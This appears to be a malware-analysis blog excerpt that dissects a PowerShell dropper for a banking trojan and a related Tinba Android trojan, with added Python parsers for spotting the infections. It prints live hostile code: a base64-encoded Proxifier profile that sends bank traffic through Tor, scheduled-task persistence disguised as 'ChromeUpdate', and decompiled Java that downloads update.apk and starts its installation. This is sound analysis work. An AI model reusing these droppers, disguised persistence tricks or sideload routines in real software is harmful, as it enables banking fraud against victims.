Base64ToFile $def_file 'PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVm
b3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4=';
AddTask 'ChromeUpdate' $p '' 1;
}
InstallTP


At the beginning there is a function 'Unzip', in charge of downloading the standalone 7-Zip binary from https://chocolatey.org/7za.exe to unzip compressed files (falling back to the Shell.Application COM object if the download fails).

Then, the function 'Base64ToFile' base64-decodes a string and stores the output in a file.

But the key function is the last one, InstallTP, which does several things:


  1. Pulls the Task Scheduler managed library (Microsoft.Win32.TaskScheduler.dll) from http://download-codeplex.sec.s-msft.com/Download/Release?ProjectName=taskscheduler&DownloadId=1505290&FileTime=131142250937900000&Build=21031 and loads it with Assembly.LoadFile, which permits registering the malicious processes as scheduled tasks through the AddTask function: Tor as 'SkypeUpdateTask' (launched through mshta.exe with a javascript: URL and a hidden window) and Proxifier as 'ChromeUpdate' (logon trigger plus a time trigger repeating every 20 minutes)
  2. Pulls the Tor client from https://dist.torproject.org/torbrowser/6.0.4/tor-win32-0.2.8.6.zip to forward the traffic through Tor
  3. Pulls the Proxifier application from http://proxifier.com/distr/ProxifierPE.zip
  4. Configures the Settings.ini for Proxifier
  5. And finally, the interesting stuff: the Proxifier profile (Default.ppx), where I can see all the banks for which the traffic is sent through Tor

echo "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"  | base64 --decode
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <Options>
    <Resolve>
      <AutoModeDetection enabled="false" />
      <ViaProxy enabled="true">
        <TryLocalDnsFirst enabled="false" />
      </ViaProxy>
      <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList>
    </Resolve>
    <ProxificationPortableEngine subsystem="32">
      <Location>BaseProvider</Location>
      <Type hotpatch="true">Prologue</Type>
    </ProxificationPortableEngine>
    <ProxificationPortableEngine subsystem="64">
      <Location>BaseProvider</Location>
      <Type hotpatch="false">Prologue</Type>
    </ProxificationPortableEngine>
    <Encryption mode="basic" />
    <HttpProxiesSupport enabled="false" />
    <HandleDirectConnections enabled="false" />
    <ConnectionLoopDetection enabled="true" />
    <ProcessServices enabled="false" />
    <ProcessOtherUsers enabled="false" />
  </Options>
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
      <Options>48</Options>
    </Proxy>
  </ProxyList>
  <ChainList />
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>

So in essence, and answering my own question, the proxy configuration is not downloaded from anywhere, but just hardcoded and obfuscated in the code. The profile sends the traffic of firefox.exe, iexplore.exe and chrome.exe towards the listed bank domains (and any *.onion address) to the SOCKS5 proxy on 127.0.0.1:9050, i.e. the local tor.exe, while everything else, including the api.ipify.org check, goes direct.
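As an added example (not the author's code and not from Proxifier), here is a Python parser for this profile format that answers the two questions a responder has when a Default.ppx like this turns up on a host: which proxy does it point at, and would this browser's connection to this bank host go through it? Rules are evaluated top-down with first match winning, and target patterns are treated as case-insensitive globs; both are assumptions about Proxifier's semantics, good enough to triage the profile above. The embedded profile is a constructed, shortened copy of the decoded one.

```python
import fnmatch
import xml.etree.ElementTree as ET

# Constructed, shortened copy of the decoded Default.ppx above (same schema, fewer targets).
SAMPLE_PROFILE = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310">
  <ProxyList>
    <Proxy id="100" type="SOCKS5">
      <Address>127.0.0.1</Address>
      <Port>9050</Port>
    </Proxy>
  </ProxyList>
  <RuleList>
    <Rule enabled="true">
      <Name>Localhost</Name>
      <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets>
      <Action type="Direct" />
    </Rule>
    <Rule enabled="true">
      <Name>soft</Name>
      <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications>
      <Targets>*postfinance.ch;cs.directnet.com;*.ubs.com;*.zkb.ch;*.onion;*valiant.ch</Targets>
      <Action type="Proxy">100</Action>
    </Rule>
    <Rule enabled="true">
      <Name>Default</Name>
      <Action type="Direct" />
    </Rule>
  </RuleList>
</ProxifierProfile>
"""


def _split_list(text):
    """Proxifier stores lists as ';'-separated strings with optional whitespace."""
    return [item.strip() for item in (text or "").split(";") if item.strip()]


def parse_profile(xml_text):
    """Extract proxies and enabled rules, resolving each Proxy action to its proxy entry."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    proxies = {}
    for proxy in root.iter("Proxy"):
        proxies[proxy.get("id")] = {
            "type": proxy.get("type"),
            "address": proxy.findtext("Address"),
            "port": int(proxy.findtext("Port")),
        }
    rules = []
    for rule in root.iter("Rule"):
        if rule.get("enabled") != "true":
            continue
        action = rule.find("Action")
        kind = action.get("type")
        rules.append({
            "name": rule.findtext("Name"),
            "applications": _split_list(rule.findtext("Applications")),
            "targets": _split_list(rule.findtext("Targets")),
            "action": kind,
            "proxy": proxies.get((action.text or "").strip()) if kind == "Proxy" else None,
        })
    return {"proxies": proxies, "rules": rules}


def _matches_any(value, patterns):
    # Assumption: Proxifier patterns behave like case-insensitive globs; an empty list means "any".
    return not patterns or any(fnmatch.fnmatchcase(value.lower(), p.lower()) for p in patterns)


def route_for(profile, process_name, host):
    """First enabled rule whose application and target lists both match wins (assumed top-down order)."""
    for rule in profile["rules"]:
        if _matches_any(process_name, rule["applications"]) and _matches_any(host, rule["targets"]):
            return rule
    return None


def proxied_targets(profile):
    """Every target pattern that is sent to a proxy: the bank list the post is after."""
    return sorted({t for r in profile["rules"] if r["action"] == "Proxy" for t in r["targets"]})


if __name__ == "__main__":
    prof = parse_profile(SAMPLE_PROFILE)
    for host in ("www.postfinance.ch", "api.ipify.org", "www.example.com"):
        rule = route_for(prof, "chrome.exe", host)
        print(host, "->", rule["name"], rule["action"], rule["proxy"])
```

Because the proxy entry resolves to 127.0.0.1:9050, a browser process opening a connection to that port (Sysmon event 3) is a cheap endpoint indicator for this setup, and the Localhost rule explains why the api.ipify.org geolocation check in the dropper still sees the victim's real public IP.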

Thursday, January 21, 2016

Tinba: Continuation of the APK malware analysis

In my previous post I explained that the new version of the Android banking trojan related to Tinba is able to install other APKs for persistence purposes. From a first look at both samples, the core functionality in terms of stealing 2FA remains the same. However, in terms of the capability to install new APKs, only one of them has it.

In order to perform the installation, I can see in the AndroidManifest.xml that there are some extra permissions in one of the APKs:
"android.permission.BIND_ACCESSIBILITY_SERVICE", which is clearly related to the way the malware fools the user through the accessibility menu, as explained in the previous post.

 

What I am really interested in are the Java methods in charge of downloading the APK and performing the installation. Looking around a bit with Androguard and following the code flow, I ended up with a class file which contains the code:


package com.google.securesms.xservices;
public class g extends android.os.AsyncTask {
    final synthetic com.google.securesms.xservices.XUpdate a;
    private android.content.Context b;

    public g(com.google.securesms.xservices.XUpdate p1)
    {
        this.a = p1;
        return;
    }

    protected varargs Void a(String[] p6)
    {
        android.content.Intent v0_3 = ((java.net.HttpURLConnection) new java.net.URL(p6[0]).openConnection());
        v0_3.setRequestMethod("GET"); 
        v0_3.setDoOutput(1);
        v0_3.connect();
        String v2_3 = new java.io.File(new StringBuilder().append(android.os.Environment.getExternalStorageDirectory()).append("/download/").toString());
        v2_3.mkdirs();
        android.content.Context v1_10 = new java.io.File(v2_3, "update.apk");
        if (v1_10.exists()) {
            v1_10.delete();
        }
        String v2_6 = new java.io.FileOutputStream(v1_10);
        android.content.Intent v0_4 = v0_3.getInputStream();
        android.content.Context v1_12 = new byte[1024];
        while(true) {
            String v3_1 = v0_4.read(v1_12);
            if (v3_1 == -1) {
                break;
            }
            v2_6.write(v1_12, 0, v3_1);
        }
        v2_6.close();
        v0_4.close();
        android.content.Intent v0_6 = new android.content.Intent("android.intent.action.VIEW");
        v0_6.setDataAndType(android.net.Uri.fromFile(new java.io.File(new StringBuilder().append(android.os.Environment.getExternalStorageDirectory()).append("/download/update.apk").toString())), "application/vnd.android.package-archive");
        v0_6.setFlags(268435456);
        this.b.startActivity(v0_6);
        return 0;
    }

    public void a(android.content.Context p1)
    {
        this.b = p1;
        return;
    }

    protected synthetic Object doInBackground(Object[] p2)
    {
        return this.a(((String[]) p2));
    }
}


This class basically downloads a file and saves it as 'update.apk' in the 'download' folder of the external storage directory, which in the end is /sdcard/download/update.apk. Later on, through the intent 'android.intent.action.VIEW' with the MIME type application/vnd.android.package-archive, the file is opened, i.e. handed to the package installer, as can be seen in the logs:

 I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=file:///storage/emulated/0/Download/update.apk typ=application/vnd.android.package-archive cmp=com.android.packageinstaller/.PackageInstallerActivity} from uid 10084 on display 0

 I/ActivityManager(778): START u0 {dat=file:///storage/emulated/0/Download/update.apk cmp=com.android.packageinstaller/.InstallAppProgress (has extras)} from uid 10063 on display 0
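As an added example (not part of the original post), a small Python parser for these ActivityManager START lines that flags package-installer activities launched on an APK sitting on external storage, which is exactly the pattern above. The logcat lines are constructed from the two quoted above plus a benign VIEW intent; the set of external-storage URI prefixes is an assumption.

```python
import re

# Constructed logcat lines modelled on the two ActivityManager lines quoted above, plus a benign VIEW.
SAMPLE_LOGCAT = [
    "I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=file:///storage/emulated/0/Download/update.apk typ=application/vnd.android.package-archive cmp=com.android.packageinstaller/.PackageInstallerActivity} from uid 10084 on display 0",
    "I/ActivityManager(778): START u0 {dat=file:///storage/emulated/0/Download/update.apk cmp=com.android.packageinstaller/.InstallAppProgress (has extras)} from uid 10063 on display 0",
    "I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=https://www.example.org/ cmp=com.android.chrome/com.google.android.apps.chrome.Main} from uid 10120 on display 0",
]

START_RE = re.compile(r"ActivityManager\(\d+\): START u(?P<user>\d+) \{(?P<body>[^}]*)\} from uid (?P<uid>\d+)")
KV_RE = re.compile(r"\b(act|dat|typ|cmp|flg)=(\S+)")
APK_MIME = "application/vnd.android.package-archive"
# Assumed external-storage URI prefixes; extend for the devices you actually see.
EXTERNAL_PREFIXES = ("file:///storage/", "file:///sdcard/", "file:///mnt/sdcard/")


def parse_start(line):
    """Return the intent fields of an ActivityManager START line, or None if it is not one."""
    m = START_RE.search(line)
    if not m:
        return None
    intent = dict(KV_RE.findall(m.group("body")))
    intent["user"] = int(m.group("user"))
    intent["uid"] = int(m.group("uid"))
    return intent


def is_sideload_install(intent):
    """True when the platform package installer is started on an APK that lives on external storage."""
    if not intent:
        return False
    to_installer = intent.get("cmp", "").startswith("com.android.packageinstaller/")
    dat = intent.get("dat", "")
    looks_like_apk = intent.get("typ") == APK_MIME or dat.lower().endswith(".apk")
    on_external_storage = dat.startswith(EXTERNAL_PREFIXES)
    return to_installer and looks_like_apk and on_external_storage


def find_sideload_installs(lines):
    """Collect the installs a responder would want to see, with the uid that requested them."""
    hits = []
    for line in lines:
        intent = parse_start(line)
        if is_sideload_install(intent):
            hits.append({"uid": intent["uid"], "apk": intent["dat"], "component": intent["cmp"]})
    return hits


if __name__ == "__main__":
    for hit in find_sideload_installs(SAMPLE_LOGCAT):
        print(hit)
```

The uid in each hit is what ties the install back to the requesting app: 10084 is the dropper handing the APK to PackageInstallerActivity, and the follow-up InstallAppProgress start comes from the installer's own uid (10063), which is the second line.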


The URL from which the malware is downloaded is stored in the initial MainPref.xml, in the DOWNLOAD_URL field. That field is read by one of the methods called in com.google.securesms.xservices, and the download task is only launched when DOWNLOAD_URL is not empty:


package com.google.securesms.xservices;
public class XUpdate extends android.content.BroadcastReceiver {

    public XUpdate()
    {
        return;
    }

    public void onReceive(android.content.Context p6, android.content.Intent p7)
    {
        if (com.google.securesms.j.i.a("DEL", 0, p6) <= 0) {
            if ((!com.google.securesms.j.i.c()) || ((!com.google.securesms.j.i.r(p6)) || ((com.google.securesms.i.ac.a(p6)) || (com.google.securesms.j.i.a("RTB", 0, p6) <= 0)))) {
                if ((!com.google.securesms.j.i.b()) || (com.google.securesms.j.i.r(p6))) {
                    if ((com.google.securesms.j.i.b()) && ((com.google.securesms.j.i.r(p6)) && ((!com.google.securesms.j.i.a(p6, com.google.securesms.j.i.c)) && (!com.google.securesms.j.i.a("DOWNLOAD_URL", "", p6).isEmpty())))) {
                        com.google.securesms.xservices.g v0_17 = new com.google.securesms.xservices.g(this);
                        v0_17.a(p6);
                        String[] v1_2 = new String[1];
                        v1_2[0] = com.google.securesms.j.i.a("DOWNLOAD_URL", "", p6);
                        v0_17.execute(v1_2);
                    }
                } else {
                    com.google.securesms.xservices.g v0_19 = new android.content.Intent(p6, com.google.securesms.xpack.ActAS);
                    v0_19.addFlags(131072);
                    v0_19.addFlags(268435456);
                    p6.startActivity(v0_19);
                }
            } else {
                com.google.securesms.j.i.q(p6);
                android.media.RingtoneManager.getRingtone(p6, android.media.RingtoneManager.getDefaultUri(2)).play();
            }
        } else {
            com.google.securesms.j.i.c("UNINST", "Action for uninstall fixed", p6);
            com.google.securesms.xservices.g v0_25 = new android.content.Intent(p6, com.google.securesms.xpack.ActUpdate);
            v0_25.addFlags(268435456);
            p6.startActivity(v0_25);
        }
        return;
    }
}


At the time of writing this post the URL is still active, so it is possible to download the malware for further analysis. It is also reported in VT with hash
ce1cf0db8c84e9c903faf33e65c3cea4fa596e4d8ad169f9c48ed9629cf24c0d